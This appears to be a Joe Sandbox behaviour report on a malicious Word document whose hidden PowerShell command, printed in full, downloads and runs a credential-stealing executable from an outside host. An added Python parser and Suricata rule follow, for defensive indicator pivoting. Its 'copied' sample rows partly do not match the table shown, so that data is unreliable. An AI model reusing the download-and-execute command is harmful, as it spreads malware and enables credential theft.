Source: wxkh.exe | Binary or memory string: <br><span style=font-size:14px;font-style:normal;text-decoration:none;text-transform:none;color:#0099cc;>[Program Manager]<span style=font-style:normal;text-decoration:none;text-transform:none;color:#000000;> (03/13/2018 22:30:42)</span></span><br><font color=#008000>{ESC}</font><font color=#008000>{ESC}</font><font color=#008000>{ESC}</font>`
Source: wxkh.exe | Binary or memory string: Program Managerp
Source: wxkh.exe | Binary or memory string: <br><span style=font-size:14px;font-style:normal;text-decoration:none;text-transform:none;color:#0099cc;>[Program Manager]<span style=font-style:normal;text-decoration:none;text-transform:none;color:#000000;> (03/13/2018 22:30:42)</span></span><br>
Source: wxkh.exe | Binary or memory string: Program ManagerL
Source: wxkh.exe | Binary or memory string: Progman
Source: wxkh.exe | Binary or memory string: <br><span style=font-size:14px;font-style:normal;text-decoration:none;text-transform:none;color:#0099cc;>[Program Manager]<span style=font-style:normal;text-decoration:none;text-transform:none;color:#000000;> (03/13/2018 22:30:42)</span></span><br><font color=#008000>{ESC}</font><font color=#008000>{ESC}</font>`
Source: wxkh.exe | Binary or memory string: <br><span style=font-size:14px;font-style:normal;text-decoration:none;text-transform:none;color:#0099cc;>[Program Manager]<span style=font-style:normal;text-decoration:none;text-transform:none;color:#000000;> (03/13/2018 22:30:42)</span></span><br><font color=#008000>{ESC}</font>`
Source: wxkh.exe | Binary or memory string: Program Manager
Source: wxkh.exe | Binary or memory string: Shell_TrayWnd
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -noprofile If (test-path $env:APPDATA + '\wxkh.exe') {Remove-Item $env:APPDATA + '\wxkh.exe'}; $OEKQD = New-Object System.Net.WebClient; $OEKQD.Headers['User-Agent'] = 'USR-KL'; $OEKQD.DownloadFile('http://peadarking.com/blackgate.ie/bless/kccInvoice.exe', $env:APPDATA + '\wxkh.exe'); (New-Object -com Shell.Application).ShellExecute($env:APPDATA + '\wxkh.exe'); Stop-Process -Id $Pid -Force
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -noprofile If (test-path $env:APPDATA + '\wxkh.exe') {Remove-Item $env:APPDATA + '\wxkh.exe'}; $OEKQD = New-Object System.Net.WebClient; $OEKQD.Headers['User-Agent'] = 'USR-KL'; $OEKQD.DownloadFile('http://peadarking.com/blackgate.ie/bless/kccInvoice.exe', $env:APPDATA + '\wxkh.exe'); (New-Object -com Shell.Application).ShellExecute($env:APPDATA + '\wxkh.exe'); Stop-Process -Id $Pid -Force
Injects a PE file into a foreign process
Source: C:\Users\user\AppData\Roaming\wxkh.exe | Memory written: C:\Users\user\AppData\Roaming\wxkh.exe base: 400000 value starts with: 4D5A
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\wxkh.exe | Thread register set: target process: 2328

Anti Debugging:

Creates guard pages, often used to prevent reverse engineering and debugging
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory allocated: page read and write and page guard
Checks for debuggers (devices)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\WinSxS\FileMaps\users_sam_tarwell_appdata_roaming_0fa0aa283d546a40.cdf-ms
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | System information queried: KernelDebuggerInformation
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\wxkh.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\wxkh.exe | Process token adjusted: Debug

Malware Analysis System Evasion:

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: wxkh.exe | Binary or memory string: vmtools
Source: wxkh.exe | Binary or memory string: get_Vmtools
Source: wxkh.exe | Binary or memory string: get_Vboxservice
Source: wxkh.exe | Binary or memory string: vboxservice
Queries a list of all running processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Roaming\wxkh.exe | Thread delayed: delay time: 922337203685477
Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\wxkh.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\wxkh.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE - Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wxkh.exe - Process information set: NOOPENFILEERRORBOX
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Network Connect: 78.137.164.80 80

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Queries the installation date of Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the product ID of Windows
Source: C:\Users\user\AppData\Roaming\wxkh.exe - Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wxkh.exe - Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wxkh.exe - Queries volume information: C:\ VolumeInformation

Behavior Graph


Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
Behavior Graph ID: 50178; Sample: BjgOdvod71.000; Startdate: 13/03/2018; Architecture: WINDOWS; Score: 100

Sample-level signatures:
  • Multi AV Scanner detection for submitted file
  • .NET source code contains very large array initializations
  • Suspicious powershell command line found
  • 7 other signatures

Process chain (counts in parentheses are created registry values / created files, as in the legend):
  • WINWORD.EXE (304 / 23), started
    Signatures: Suspicious powershell command line found; Tries to download and execute files (via powershell); Document exploit detected (process start blacklist hit)
  • powershell.exe (12 / 7), started by WINWORD.EXE
    DNS/IP: peadarking.com 78.137.164.80 (ports 49170, 49172, 49173), DIGIWEB-ASIE, Ireland; checkip.dyndns.org; 8.8.8.8 (ports 52046, 53, 60052), GOOGLE-GoogleIncUS, United States
    Dropped file: C:\Users\user\AppData\Roaming\wxkh.exe, PE32
    Signatures: System process connects to network (likely due to code injection or exploit); Powershell connects to network; Powershell drops PE file
  • wxkh.exe (1 / 18), started by powershell.exe
    Signatures: Multi AV Scanner detection for dropped file; Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines); Modifies the context of a thread in another process (thread injection); Injects a PE file into a foreign processes
  • wxkh.exe (12 / 15), started by wxkh.exe
    DNS/IP: checkip.dyndns.org 216.146.43.70 (ports 49171, 80), DYNDNS-DynamicNetworkServicesIncUS, United States
    Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file access); 3 other signatures

Simulations

Behavior and APIs

Time | Type | Description
22:29:30 | API Interceptor | 5x Sleep call for process: WINWORD.EXE modified
22:29:34 | API Interceptor | 4x Sleep call for process: powershell.exe modified
22:29:45 | API Interceptor | 12x Sleep call for process: wxkh.exe modified

Antivirus Detection

Initial Sample

Source | Detection | Scanner
BjgOdvod7.doc | 39% | virustotal

Dropped Files

Source | Detection | Scanner
C:\Users\user\AppData\Roaming\wxkh.exe | 24% | virustotal

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner
peadarking.com | 0% | virustotal
checkip.dyndns.org | 0% | virustotal

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs


Domains


ASN

| Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
|---|---|---|---|---|---|
| DYNDNS-DynamicNetworkServicesIncUS | 81PI-69932INV.Order.exe | 1b8fff3e901f8168aeb39209daa590f1b6540304d3ef0b52b882f9090b6faf43 | malicious | Browse | 216.146.38.70 |
| | 8Purchase Order_pdf.exe | c507602ea628cf7114397234fcd503713bfd53e4665d68fbcf7dc0d5997675f5 | malicious | Browse | 91.198.22.70 |
| | 67Invoice details_pdf.exe | 17f360d3dd353fe906a7961dd69de30d9d274e47d63a7a9e8b1dddc0d3f4db4c | malicious | Browse | 91.198.22.70 |
| | 58Order-Quotation.exe | aaa2a75497914c77c42a98f1607de2b9b0abbc82db345d699cb751781f5b7717 | malicious | Browse | 216.146.43.71 |
| | 77inquiry.exe | 2af049dcfa207c65e7bf025982de02fc4985b13b893ccdd0966427688b43cb92 | malicious | Browse | 91.198.22.70 |
| | 40BLS1267_R0 PROFORMA INVOICE.exe | a649d29c533e965816469bc3c7084a6c3c967c9ce05373bbc90ddcddc0f6bef8 | malicious | Browse | 216.146.43.70 |
| | 53Invoice$67,22373.exe | 0c6668944c0a61c84bc50f513e2e9797627d37fa193d61b3f9435e1b81f941dd | malicious | Browse | 91.198.22.70 |
| | 19Account Misuse Mails.exe | d3977205c6ee79db494b6478ae33a727168a20f4e43bd3994c7c2212ed177a9e | malicious | Browse | 216.146.43.71 |
| | 37Statment of account.exe | a4e7978ec730c544edb60f73745059524b03e9255717d760284e120d576ca97e | malicious | Browse | 216.146.43.70 |
| | 62Specification, Drawings and Product list.exe | cb0f7ce4bedb89b2f702f35874e6ea0d9d90080a9a3d771cf65b30d4830cebaa | malicious | Browse | 91.198.22.70 |
| | 7Order Status.exe | 06898960afad79237b55f1fc3dfec8ab7b7d94092fe77887591e1fe6014fb410 | malicious | Browse | 216.146.38.70 |
| | BinderFile.exe | 25e9f71272ad2afd08692d6f248bb18ca6f73a6f342b65b1f5f3b1d9e91f9cd4 | malicious | Browse | 216.146.43.71 |
| | 53Complaint E-mail.exe | 4fc04ae96b5a45acb1d345eae453b7d792e9d2464aea9b20abbc9023739f2ee1 | malicious | Browse | 216.146.38.70 |
| | 34Outstanding Report.exe | 0c479ac451401ec9db154e75933bd75ecf992fa2eeda268cc8eb87e30b7667f1 | malicious | Browse | 216.146.43.71 |
| | 51January 2018-Proforma Invoice..exe | e1db659288eae8bebc99a64c1a5a215fb8e1087b77867215ba3dbb5216d679a5 | malicious | Browse | 91.198.22.70 |
| | 23Payment copy.exe | dcdcdfb239595ca4c4c712fff48d18608a345b9e8c89511d6dc50a60e5904199 | malicious | Browse | 216.146.38.70 |
| | 31Tender Copy_00901.exe | feb46559f7e617f94e84473d292236e862270ec8f95f4666d156370465646059 | malicious | Browse | 216.146.43.70 |
| | 69Quotation00687USA.exe | 4607a917a433b4bbb0be4eda47cc56b8cabf7515c851b4a19fdd5de9c690f928 | malicious | Browse | 216.146.38.70 |
| | 38QUOTATION LIST HF20180122,,................................. PDF.exe | 035eb2826b207cca90452cd8a08b83a1cb9dd1ae4e5e71e04e120d5db6a91dd0 | malicious | Browse | 216.146.43.70 |
| | 65Details of Account Misuse.exe | 40bf455b1774d2e9c95f85ac97977fc762b853f8a25285b837f7929d700f2f1f | malicious | Browse | 216.146.43.70 |
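The URL, Domains and ASN context tables above all pivot on the same indicator: every listed sample resolved checkip.dyndns.org, a public-IP lookup service that stealers and keyloggers commonly call before exfiltrating. When such a report is pulled as text, the columns are run together, which makes the hashes and IPs awkward to reuse. The following Python is an added example, not part of the Joe Sandbox report: it parses rows in exactly that flattened shape (sample name, 64-hex SHA-256, verdict and the "Browse" link text concatenated, with the context IP as a bullet on the next line), strips the shared Match value, collects the resolved IPs as a pivot set, and emits an alert-only Suricata rule for the domain. The three input rows are copied from the Domains table; the verdict vocabulary beyond "malicious" (suspicious, clean, unknown) and the Suricata 5+ `dns.query` keyword are assumptions.

```python
import re
from collections import OrderedDict

# Constructed input: three rows copied from the "Domains" context table, in the
# run-together form the text extraction left them in (Match, sample name, SHA-256,
# detection and link text concatenated; the context IP follows as a bullet line).
FLATTENED_ROWS = """\
checkip.dyndns.orginvoice.exe73c77f86b2a989f4f97a401f6255cc91f4763a35e8e1193719c6edf90e92bcc5maliciousBrowse
  • 216.146.38.70
PO.exe7a5552d1ff6d3c08e9a83455b71dbf546e78e2da29086a38a8a75e3a58a06002maliciousBrowse
  • 216.146.43.70
8Purchase Order_pdf.exec507602ea628cf7114397234fcd503713bfd53e4665d68fbcf7dc0d5997675f5maliciousBrowse
  • 91.198.22.70
"""

# A row is <name><64 hex chars><detection>Browse. Anchoring on the fixed tail pins the
# hash to the 64 characters before the verdict word, so a sample name that ends in a
# hex digit ("invoice.exe") cannot steal a character from the hash.
# Verdicts other than "malicious" are an assumption about the report vocabulary.
ROW_RE = re.compile(
    r"^(?P<name>.*?)(?P<sha256>[0-9a-fA-F]{64})"
    r"(?P<detection>malicious|suspicious|clean|unknown)Browse$"
)


def parse_context_table(text, match):
    """Split flattened context-table rows into records.

    `match` is the table's Match value (the URL, domain or ASN the samples share);
    the report prints it only on the first row, so it is stripped when present.
    """
    rows = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("\u2022"):
            # Bullet line: the context value belongs to the preceding row.
            if not rows:
                raise ValueError("context bullet before any row: %r" % line)
            rows[-1]["context"].append(line[1:].strip())
            continue
        m = ROW_RE.match(line)
        if m is None:
            raise ValueError("unrecognised row: %r" % line)
        name = m.group("name")
        if name.startswith(match):
            name = name[len(match):]
        rows.append({
            "match": match,
            "sample": name,
            "sha256": m.group("sha256").lower(),
            "detection": m.group("detection"),
            "context": [],
        })
    return rows


def pivot_ips(rows):
    """Unique resolved IPs across all rows, sorted, for pivoting into other telemetry."""
    return sorted({ip for r in rows for ip in r["context"]})


def sample_hashes(rows, detection="malicious"):
    """SHA-256 values of samples with the given verdict, in table order, deduplicated."""
    return list(OrderedDict.fromkeys(
        r["sha256"] for r in rows if r["detection"] == detection))


def suricata_dns_rule(domain, sid):
    """Suricata (5.x+, dns.query sticky buffer) rule alerting on queries for the domain.

    Alert rather than drop: checkip.dyndns.org is a legitimate public-IP lookup
    service, so the query is only interesting once correlated with the querying process.
    """
    return (
        'alert dns any any -> any any ('
        'msg:"Sandbox pivot: DNS query for %s"; dns.query; content:"%s"; nocase; '
        'sid:%d; rev:1;)' % (domain, domain, sid)
    )


if __name__ == "__main__":
    rows = parse_context_table(FLATTENED_ROWS, "checkip.dyndns.org")
    for r in rows:
        print(r["sample"], r["sha256"], r["detection"], ",".join(r["context"]))
    print("pivot IPs:", pivot_ips(rows))
    print(suricata_dns_rule("checkip.dyndns.org", 1000001))
```

The pivot IPs are the DynDNS service's own addresses, not attacker infrastructure, so they are useful for finding other hosts that performed the same lookup, not as block-list entries. The hash list is the actionable part: feed it to EDR or file-integrity searches, and treat a checkip.dyndns.org query from a process spawned under WINWORD.EXE or powershell.exe (as in this analysis) as the trigger, not the query alone.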

Dropped Files

No context

Screenshot